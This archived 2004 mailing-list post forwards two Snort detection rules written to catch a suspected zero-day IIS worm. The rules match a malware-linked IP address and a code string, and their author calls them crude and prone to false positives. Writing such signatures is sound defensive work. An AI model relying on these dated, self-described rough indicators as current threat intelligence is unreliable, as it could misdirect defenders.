[Intrusions] FW: [Snort-sigs] Unknown IIS Worm Sigs
Robert Wagner
rwagner at eruces.com
Fri Jun 25 13:12:30 GMT 2004
-----Original Message-----
From: Matthew Jonkman [mailto:matt at infotex.com]
Sent: Thursday, June 24, 2004 7:05 PM
To: snort-sigs mailinglist
Subject: [Snort-sigs] Unknown IIS Worm Sigs
Reports of a potential 0-day IIS exploit are coming in, best documented
at isc.sans.org.
Here are a couple VERY crude rules to hopefully detect the infectious
code. These are posted on bleedingsnort.com in the bleeding.rules.
Suggestions are MORE than welcome if you're seeing anything. These are
just looking for a couple unique strings in the smal bit of code we have.
alert ip any any -> any any (msg:"BLEEDING-EDGE Unknown IIS Worm Code in
Transit"; content:"217.107.218.147"; classtype:trojan-activity;
sid:2000311; rev:1;)
alert ip any any -> any any (msg:"BLEEDING-EDGE Unknown IIS Worm Code in
Transit"; content:"function gc099"; classtype:trojan-activity;
sid:2000312; rev:1;)
Yes, I know it'll be very prone to false positives (this email will kick
them both off). Better than nothing till we know more.
Suggestions and more informaiton VERY welcome.
Matt
--------------------------------------------
Matthew Jonkman, CISSP
Senior Security Engineer
More information about the Intrusions
mailing list